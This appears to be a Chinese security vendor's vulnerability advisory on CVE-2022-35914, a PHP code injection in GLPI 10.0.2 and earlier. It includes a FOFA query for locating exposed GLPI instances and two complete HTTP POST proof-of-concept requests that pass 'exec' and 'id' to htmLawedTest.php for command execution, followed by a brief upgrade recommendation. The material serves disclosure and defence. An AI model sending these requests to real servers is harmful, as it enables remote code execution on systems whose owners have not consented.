提交需求
*
*

*
*
*
立即提交
点击”立即提交”,表明我理解并同意 《美创科技隐私条款》

logo

    产品与服务
    解决方案
    技术支持
    合作发展
    关于美创

    申请试用
      CVE-2022-35914:GLPI 注入漏洞简析
      发布时间:2023-02-10 阅读次数: 566 次
      漏洞概述

      GLPI是个人开发者的一款开源IT和资产管理软件。该软件提供功能全面的IT资源管理接口,可以用它来建立数据库全面管理IT的电脑,显示器,服务器,打印机,网络设备,电话,甚至硒鼓和墨盒等。

      GLPI 10.0.2及之前版本存在安全漏洞,该漏洞源于htmlawed 模块中的 /vendor/htmlawed/htmlawed/htmLawedTest.php 允许 PHP 代码注入。漏洞编号:CVE-2022-35914,漏洞等级:高危。

      影响版本

      GLPI 10.0.2及之前版本

      漏洞复现

      fofa搜索语法:


      title="GLPI - 登陆入口"

      图片

      使用Burpsuite工具抓包,执行如下POC获取token和sid的值。



      POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1Host: {hostname}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateDNT: 1Connection: closeCookie: sid=d531j7fek8t6v3d0d0jpk558q5Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 88
      token=6dfbe8fefb8bf88a06596e458b976911&text=id&hhook=exec&sid=d531j7fek8t6v3d0d0jpk558q5
      图片
      图片

      将sid在cookie头和POST数据包token参数中替换,将token在POST数据包token参数中替换,exec执行id命令,得到回显。




      POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1Host: {hostname}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateDNT: 1Connection: closeCookie: sid=53lec8gbd0dvh64k0ikst1d0riUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 88
      token=94dd0c78fff81fb34a491754631e8ee7&text=id&hhook=exec&sid=53lec8gbd0dvh64k0ikst1d0ri

      图片

      处置建议

      根据官方文档升级至最新版本。


      免费试用
      服务热线

      马上咨询

      400-811-3777

      回到顶部